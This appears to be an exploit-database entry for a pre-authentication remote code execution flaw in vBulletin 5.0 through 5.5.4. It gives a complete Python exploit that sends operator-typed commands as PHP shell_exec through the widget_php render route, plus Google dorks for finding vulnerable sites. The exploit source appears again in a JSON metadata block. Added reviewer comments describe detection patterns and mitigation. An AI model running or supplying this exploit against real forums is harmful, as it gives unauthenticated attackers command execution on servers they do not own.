ID EXPLOITPACK:777D6227CA649947B181E718CD852651
Type exploitpack
Reporter anonymous
Modified 2019-09-23T00:00:00
Description
vBulletin 5.0 through 5.5.4 - widget_php Unauthenticated Remote Code Execution
#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
import requests
import sys
# Reviewer notes (defensive reading of this listing):
# - Python 2 syntax throughout (raw_input, print statement, "except Exception, e").
#   The listing's indentation is missing as shown here.
# - The script takes exactly one argument, the base URL of a vBulletin site, and
#   sends every request to that URL unchanged.
# - Only `url` and `data` are passed to requests.post: no cookies, session or
#   credentials are supplied, which is what makes the issue pre-authentication.
# - Detection: each request is an HTTP POST whose form body carries both
#   `routestring=ajax/render/widget_php` and a `widgetConfig[code]` field holding
#   PHP source. Matching on that pair in WAF / reverse-proxy rules or request-body
#   logging identifies this traffic. NOTE(review): access logs that do not record
#   POST bodies will show only a POST to the site URL; confirm what your logging
#   captures.
# - Mitigation: the header comment states 5.0.0 through 5.5.4 are affected, so
#   move to a vendor-fixed release. Until then, block the request shape above at
#   the edge.
if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
# Fixed form field selecting the widget_php render route; reused for every request.
params = {"routestring":"ajax/render/widget_php"}
# Interactive loop: one POST per line typed by the operator.
while True:
try:
cmd = raw_input("vBulletin$ ")
# The typed text is concatenated, unescaped, into a PHP snippet that is sent as
# the widgetConfig[code] form field; the response body is whatever the server
# returns for that render request.
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = requests.post(url = sys.argv[1], data = params)
# Success is judged by HTTP status only.
# NOTE(review): a 200 alone does not show that the submitted code ran; when
# triaging logs, treat a 200 on this request shape as a lead and confirm on the
# host rather than as proof of compromise.
if r.status_code == 200:
print r.text
else:
sys.exit("Exploit failed! :(")
# Ctrl-C ends the session; any other exception exits with its message.
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception, e:
sys.exit(str(e))
{"lastseen": "2020-04-01T20:41:02", "references": [], "description": "\nvBulletin 5.0 5.5.4 - widget_php Unauthenticated Remote Code Execution", "edition": 1, "reporter": "anonymous", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2019-09-23T00:00:00", "title": "vBulletin 5.0 5.5.4 - widget_php Unauthenticated Remote Code Execution", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T20:41:02", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2020-04-01T20:41:02", "rev": 2}, "vulnersScore": 0.6}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2019-09-23T00:00:00", "id": "EXPLOITPACK:777D6227CA649947B181E718CD852651", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/python\n#\n# vBulletin 5.x 0day pre-auth RCE exploit\n# \n# This should work on all versions from 5.0.0 till 5.5.4\n#\n# Google Dorks:\n# - site:*.vbulletin.net\n# - \"Powered by vBulletin Version 5.5.4\"\n\nimport requests\nimport sys\n\nif len(sys.argv) != 2:\n sys.exit(\"Usage: %s <URL to vBulletin>\" % sys.argv[0])\n\nparams = {\"routestring\":\"ajax/render/widget_php\"}\n\nwhile True:\n try:\n cmd = raw_input(\"vBulletin$ \")\n params[\"widgetConfig[code]\"] = \"echo shell_exec('\"+cmd+\"'); exit;\"\n r = requests.post(url = sys.argv[1], data = params)\n if r.status_code == 200:\n print r.text\n else:\n sys.exit(\"Exploit failed! :(\")\n except KeyboardInterrupt:\n sys.exit(\"\\nClosing shell...\")\n except Exception, e:\n sys.exit(str(e))", "cvss": {"score": 0.0, "vector": "NONE"}}
{}